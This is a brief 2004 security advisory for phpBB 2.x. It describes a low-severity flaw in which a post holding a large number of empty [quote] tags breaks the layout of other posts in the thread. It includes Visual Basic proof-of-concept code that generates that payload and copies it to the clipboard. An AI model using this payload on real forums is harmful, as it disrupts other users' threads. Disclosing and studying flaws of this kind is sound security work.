Affected Software: phpBB 2.x (tested on 2.0.4 and 2.0.8, untested on later versions) Vulnerability: flaw in code handling the quoting of posts. Severity: Low Discovered by: Matt Benenati +Details+ ========= This flaw could allow a malicious user to alter the alignment and layout of any posts in the same thread as the exploit post. The exploit just involves using an absurd amount of blank quotes in a single post. +Exploit Code+ ============= 'phpBB Quote Exploit 'Copyright (C) 2004 by Matt Benenati ' 'text is automaticly copied to the windows clipboard 'user just has to paste the text into a post to execute the exploit Private Sub Command1_Click() Dim xptext As String Dim num1 As Integer, num2 As Integer, num3 As Integer, num4 As Integer num1% = 0 num2% = 100 num3% = 0 num4% = 100 1: xptext$ = xptext$ & "[quote]" num1% = num1% + 1 If num1% = num2% Then GoTo 2 Else GoTo 1 2: xptext$ = xptext$ & "[/quote]" num3% = num3% + 1 If num3% = num4% Then GoTo 3 Else GoTo 2 3: Clipboard.Clear Clipboard.SetText xptext$ End Sub